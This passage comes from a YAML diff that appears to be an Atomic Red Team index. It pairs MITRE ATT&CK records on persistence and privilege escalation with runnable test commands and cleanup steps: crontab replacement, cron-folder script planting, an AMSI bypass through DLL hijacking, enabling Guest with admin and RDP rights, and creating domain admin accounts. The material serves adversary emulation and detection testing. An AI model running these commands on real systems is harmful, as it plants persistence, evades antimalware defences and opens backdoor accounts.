" + id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-09T13:46:29.922Z' + created: '2020-01-10T16:03:18.865Z' + x_mitre_data_sources: + - 'Service: Service Creation' + - 'Service: Service Modification' + - 'Process: Process Creation' + - 'Process: OS API Execution' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_detection: "Monitor for changes to system processes that do not correlate + with known software, patch cycles, etc., including by comparing results against + a trusted system baseline. New, benign system processes may be created during + installation of new software. Data and events should not be viewed in isolation, + but as part of a chain of behavior that could lead to other activities, such + as network connections made for Command and Control, learning details about + the environment through Discovery, and Lateral Movement. \n\nCommand-line + invocation of tools capable of modifying services may be unusual, depending + on how systems are typically used in a particular environment. Look for abnormal + process call trees from known services and for execution of other commands + that could relate to Discovery or other adversary techniques. \n\nMonitor + for changes to files associated with system-level processes." 
+ x_mitre_platforms: + - Windows + - macOS + - Linux + atomic_tests: [] + T1053.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.003 + url: https://attack.mitre.org/techniques/T1053/003 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Cron + description: |- + Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. + + An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. cron can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. + id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-23T23:30:46.546Z' + created: '2019-12-03T14:25:00.538Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: false + x_mitre_permissions_required: + - User + x_mitre_detection: "Monitor scheduled task creation from common utilities using + command-line invocation. Legitimate scheduled tasks may be created during + installation of new software or through system administration functions. Look + for changes to tasks that do not correlate with known software, patch cycles, + etc. 
\n\nSuspicious program execution through scheduled tasks may show up + as outlier processes that have not been seen before when compared against + historical data. Data and events should not be viewed in isolation, but as + part of a chain of behavior that could lead to other activities, such as network + connections made for Command and Control, learning details about the environment + through Discovery, and Lateral Movement. " + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_platforms: + - Linux + - macOS + identifier: T1053.003 + atomic_tests: + - name: Cron - Replace crontab with referenced file + auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75 + description: 'This test replaces the current user''s crontab file with the contents + of the referenced file. This technique was used by numerous IoT automated + exploitation attacks. + +' + supported_platforms: + - macos + - linux + input_arguments: + command: + description: Command to execute + type: string + default: "/tmp/evil.sh" + tmp_cron: + description: Temporary reference file to hold evil cron schedule + type: path + default: "/tmp/persistevil" + executor: + name: bash + command: | + crontab -l > /tmp/notevil + echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} + cleanup_command: 'crontab /tmp/notevil + +' + - name: Cron - Add script to all cron subfolders + auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 + description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, + /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a + schedule. This technique was used by the threat actor Rocke during the exploitation + of Linux web servers. 
+ +' + supported_platforms: + - macos + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in cron folder + type: string + default: persistevil + executor: + elevation_required: true + name: bash + command: | + echo "#{command}" > /etc/cron.daily/#{cron_script_name} + echo "#{command}" > /etc/cron.hourly/#{cron_script_name} + echo "#{command}" > /etc/cron.monthly/#{cron_script_name} + echo "#{command}" > /etc/cron.weekly/#{cron_script_name} + cleanup_command: | + rm /etc/cron.daily/#{cron_script_name} + rm /etc/cron.hourly/#{cron_script_name} + rm /etc/cron.monthly/#{cron_script_name} + rm /etc/cron.weekly/#{cron_script_name} + - name: Cron - Add script to /var/spool/cron/crontabs/ folder + auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 + description: 'This test adds a script to a /var/spool/cron/crontabs folder configured + to execute on a schedule. This technique was used by the threat actor Rocke + during the exploitation of Linux web servers. + +' + supported_platforms: + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in /var/spool/cron/crontabs folder + type: string + default: persistevil + executor: + elevation_required: true + name: bash + command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} + +' + cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} + +' + T1574.001: + technique: + id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 + description: |- + Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. 
(Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. + + There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) + + Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking) + + If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. 
+ name: DLL Search Order Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.001 + url: https://attack.mitre.org/techniques/T1574/001 + - external_id: CAPEC-471 + source_name: capec + url: https://capec.mitre.org/data/definitions/471.html + - source_name: Microsoft Dynamic Link Library Search Order + url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN + description: Microsoft. (2018, May 31). Dynamic-Link Library Search Order. + Retrieved November 30, 2014. + - source_name: FireEye Hijacking July 2010 + url: https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html + description: Harbour, N. (2010, July 15). Malware Persistence without the + Windows Registry. Retrieved November 17, 2020. + - source_name: OWASP Binary Planting + description: OWASP. (2013, January 30). Binary planting. Retrieved June 7, + 2016. + url: https://www.owasp.org/index.php/Binary_planting + - source_name: FireEye fxsst June 2011 + url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html + description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November + 17, 2020. + - source_name: Microsoft Security Advisory 2269637 + url: https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637 + description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved + March 13, 2020. + - source_name: Microsoft Dynamic-Link Library Redirection + url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN + description: Microsoft. (2018, May 31). Dynamic-Link Library Redirection. + Retrieved March 13, 2020. + - source_name: Microsoft Manifests + description: Microsoft. (n.d.). Manifests. Retrieved December 5, 2014. 
+ url: https://msdn.microsoft.com/en-US/library/aa375365 + - source_name: FireEye DLL Search Order Hijacking + url: https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html + description: Nick Harbour. (2010, September 1). DLL Search Order Hijacking + Revisited. Retrieved March 13, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-26T18:37:03.748Z' + created: '2020-03-13T18:11:08.357Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + x_mitre_detection: Monitor file systems for moving, renaming, replacing, or + modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared + with past behavior) that do not correlate with known software, patches, etc., + are suspicious. Monitor DLLs loaded into a process and detect DLLs that have + the same file name but abnormal paths. Modifications to or creation of `.manifest` + and `.local` redirection files that do not correlate with software updates + are suspicious. + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1574.001 + atomic_tests: + - name: DLL Search Order Hijacking - amsi.dll + auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 + description: | + Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) + https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ + + Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. 
+ supported_platforms: + - windows + executor: + command: | + copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe + copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll + %APPDATA%\updater.exe -Command exit + cleanup_command: | + del %APPDATA%\updater.exe >nul 2>&1 + del %APPDATA%\amsi.dll >nul 2>&1 + name: command_prompt + elevation_required: true + T1574.002: + technique: + created: '2020-03-13T19:41:37.908Z' + modified: '2021-04-26T18:31:34.954Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1574.002 + url: https://attack.mitre.org/techniques/T1574/002 + - external_id: CAPEC-641 + source_name: capec + url: https://capec.mitre.org/data/definitions/641.html + - source_name: FireEye DLL Side-Loading + url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf + description: 'Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in + the Side of the Anti-Virus Industry. Retrieved March 13, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: DLL Side-Loading + description: |- + Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s). 
+ + Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading) + id: attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b + x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_detection: Monitor processes for unusual activity (e.g., a process that + does not use the network begins to do so) as well as the introduction of new + files/programs. Track DLL metadata, such as a hash, and compare DLLs that + are loaded at process execution time against previous executions to detect + differences that do not correlate with patching or updates. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' + x_mitre_platforms: + - Windows + identifier: T1574.002 + atomic_tests: + - name: DLL Side-Loading using the Notepad++ GUP.exe binary + auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040 + description: | + GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. + Upon execution, calc.exe will be opened. 
+ supported_platforms: + - windows + input_arguments: + process_name: + description: Name of the created process + type: string + default: calculator.exe + gup_executable: + description: GUP is an open source signed binary used by Notepad++ for software + updates + type: path + default: PathToAtomicsFolder\T1574.002\bin\GUP.exe + dependency_executor_name: powershell + dependencies: + - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) + +' + prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" + executor: + command: "#{gup_executable}\n" + cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 + +' + name: command_prompt + T1078.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1078.001 + url: https://attack.mitre.org/techniques/T1078/001 + - external_id: CAPEC-70 + source_name: capec + url: https://capec.mitre.org/data/definitions/70.html + - source_name: Microsoft Local Accounts Feb 2019 + url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts + description: Microsoft. (2018, December 9). Local Accounts. Retrieved February + 11, 2019. + - source_name: AWS Root User + url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html + description: Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021. + - source_name: Threat Matrix for Kubernetes + url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved + March 30, 2021. 
+ - source_name: Metasploit SSH Module + url: https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh + description: Metasploit. (n.d.). Retrieved April 12, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Default Accounts + description: |- + Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes) + + Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. 
Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) + id: attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-04-05T20:14:26.846Z' + created: '2020-03-13T20:15:31.974Z' + x_mitre_version: '1.2' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: Monitor whether default accounts have been activated or logged + into. These audits should also include checks on any appliances and applications + for default credentials or SSH keys, and if any are discovered, they should + be updated immediately. + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS + - Linux + - macOS + - Google Workspace + - Containers + identifier: T1078.001 + atomic_tests: + - name: Enable Guest account with RDP capability and admin priviliges + auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 + description: After execution the Default Guest account will be enabled (Active) + and added to Administrators and Remote Desktop Users Group, and desktop will + allow multiple RDP connections + supported_platforms: + - windows + input_arguments: + guest_user: + description: Specify the guest account + type: String + default: guest + guest_password: + description: Specify the guest password + type: String + default: Password123! 
+ executor: + command: |- + net user #{guest_user} /active:yes + net user #{guest_user} #{guest_password} + net localgroup administrators #{guest_user} /add + net localgroup "Remote Desktop Users" #{guest_user} /add + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f + cleanup_command: |- + net user #{guest_user} /active:no >nul 2>&1 + net localgroup administrators #{guest_user} /delete >nul 2>&1 + net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 + name: command_prompt + elevation_required: true + T1136.002: + technique: + created: '2020-01-28T14:05:17.825Z' + modified: '2020-03-23T18:12:36.696Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177 + description: |- + Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account. + + Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. 
+ name: Domain Account + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1136.002 + url: https://attack.mitre.org/techniques/T1136/002 + - source_name: Microsoft User Creation Event + description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account + was created. Retrieved June 30, 2017.' + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720 + x_mitre_platforms: + - Windows + - macOS + - Linux + x_mitre_data_sources: + - 'User Account: User Account Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: 'Monitor for processes and command-line parameters associated + with domain account creation, such as net user /add /domain. + Collect data on account creation within a network. Event ID 4720 is generated + when a user account is created on a Windows domain controller. (Citation: + Microsoft User Creation Event) Perform regular audits of domain accounts to + detect suspicious accounts that may have been created by an adversary.' + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1136.002 + atomic_tests: + - name: Create a new Windows domain admin user + auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 + description: 'Creates a new domain admin user in a command prompt. + +' + supported_platforms: + - windows + input_arguments: + username: + description: Username of the user to create + type: String + default: T1136.002_Admin + password: + description: Password of the user to create + type: String + default: T1136_pass123! 
+ group: + description: Domain administrator group to which add the user to + type: String + default: Domain Admins + executor: + command: | + net user "#{username}" "#{password}" /add /domain + net group "#{group}" "#{username}" /add /domain + cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain + +' + name: command_prompt + elevation_required: false + - name: Create a new account similar to ANONYMOUS LOGON + auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 + description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt. + +' + supported_platforms: + - windows + input_arguments: + username: + description: Username of the user to create + type: String + default: ANONYMOUS LOGON + password: + description: Password of the user to create + type: String + default: T1136_pass123! + executor: + command: 'net user "#{username}" "#{password}" /add /domain + +' + cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain + +' + name: command_prompt + elevation_required: false + - name: Create a new Domain Account using PowerShell + auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 + description: 'Creates a new Domain User using the credentials of the Current + User + +' + supported_platforms: + - windows + input_arguments: + username: + description: Name of the Account to be created + type: String + default: T1136.002_Admin + password: + description: Password of the Account to be created + type: String + default: T1136_pass123! 
+ executor: + command: | + $SamAccountName = '#{username}' + $AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force + Add-Type -AssemblyName System.DirectoryServices.AccountManagement + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain) + $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context) + $User.SamAccountName = $SamAccountName + $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) + $User.SetPassword($TempCred.GetNetworkCredential().Password) + $User.Enabled = $True + $User.PasswordNotRequired = $False + $User.DisplayName = $SamAccountName + $User.Save() + $User + cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain + +' + name: powershell + elevation_required: false + T1078.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1078.002 + url: https://attack.mitre.org/techniques/T1078/002 + - external_id: CAPEC-560 + source_name: capec + url: https://capec.mitre.org/data/definitions/560.html + - url: https://technet.microsoft.com/en-us/library/dn535501.aspx + description: Microsoft. (2016, April 15). Attractive Accounts for Credential + Theft. Retrieved June 3, 2016. + source_name: TechNet Credential Theft + - source_name: Microsoft AD Accounts + url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts + description: Microsoft. (2019, August 23). Active Directory Accounts. Retrieved + March 13, 2020. + - url: https://technet.microsoft.com/en-us/library/dn487457.aspx + description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved + June 3, 2016. 
+ source_name: TechNet Audit Policy + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Domain Accounts + description: |- + Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) + + Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. + id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2020-09-16T19:42:11.787Z' + created: '2020-03-13T20:21:54.758Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: |- + Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. 
Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). + + Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence. + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_platforms: + - Linux + - macOS + - Windows + atomic_tests: [] + T1556.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1556.001 + url: https://attack.mitre.org/techniques/T1556/001 + - source_name: Dell Skeleton + description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. + Retrieved April 8, 2019. + url: https://www.secureworks.com/research/skeleton-key-malware-analysis + - url: https://technet.microsoft.com/en-us/library/dn487457.aspx + description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved + June 3, 2016. + source_name: TechNet Audit Policy + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Domain Controller Authentication + description: "Adversaries may patch the authentication process on a domain controller + to bypass the typical authentication mechanisms and enable access to accounts. + \n\nMalware may be used to inject false credentials into the authentication + process on a domain controller with the intent of creating a backdoor used + to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). 
+ Skeleton key works through a patch on an enterprise domain controller authentication + process (LSASS) with credentials that adversaries may use to bypass the standard + authentication system. Once patched, an adversary can use the injected password + to successfully authenticate as any domain user account (until the the skeleton + key is erased from memory by a reboot of the domain controller). Authenticated + access may enable unfettered access to hosts and/or resources within single-factor + authentication environments.(Citation: Dell Skeleton)" + id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:10:26.613Z' + created: '2020-02-11T19:05:02.399Z' + x_mitre_data_sources: + - 'Logon Session: Logon Session Creation' + - 'Process: OS API Execution' + - 'Process: Process Access' + - 'File: File Modification' + x_mitre_permissions_required: + - Administrator + x_mitre_detection: "Monitor for calls to OpenProcess that can be + used to manipulate lsass.exe running on a domain controller as well as for + malicious modifications to functions exported from authentication-related + system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)\n\nConfigure + robust, consistent account activity audit policies across the enterprise and + with externally accessible services.(Citation: TechNet Audit Policy) Look + for suspicious account behavior across systems that share accounts, either + user, admin, or service accounts. Examples: one account logged into multiple + systems simultaneously; multiple accounts logged into the same machine simultaneously; + accounts logged in at odd times or outside of business hours. 
Activity may + be from interactive login sessions or process ownership from accounts being + used to execute binaries on a remote system as a particular account. Correlate + other security systems with login information (e.g. a user has an active login + session but has not entered the building or does not have VPN access). " + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + atomic_tests: [] + T1574.004: + technique: + id: attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490 + description: |- + Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added. + + Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. 
This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO) + name: Dylib Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.004 + url: https://attack.mitre.org/techniques/T1574/004 + - external_id: CAPEC-471 + source_name: capec + url: https://capec.mitre.org/data/definitions/471.html + - source_name: Wardle Dylib Hijack Vulnerable Apps + url: https://objective-see.com/blog/blog_0x46.html + description: Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore + Apps. Retrieved March 31, 2021. + - source_name: Wardle Dylib Hijacking OSX 2015 + url: https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf + description: Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved + March 29, 2021. + - source_name: Github EmpireProject HijackScanner + url: https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py + description: Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib + Hijack Vulnerability Scanner. Retrieved April 1, 2021. + - source_name: Github EmpireProject CreateHijacker Dylib + url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py + description: Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib + Hijacker. Retrieved April 1, 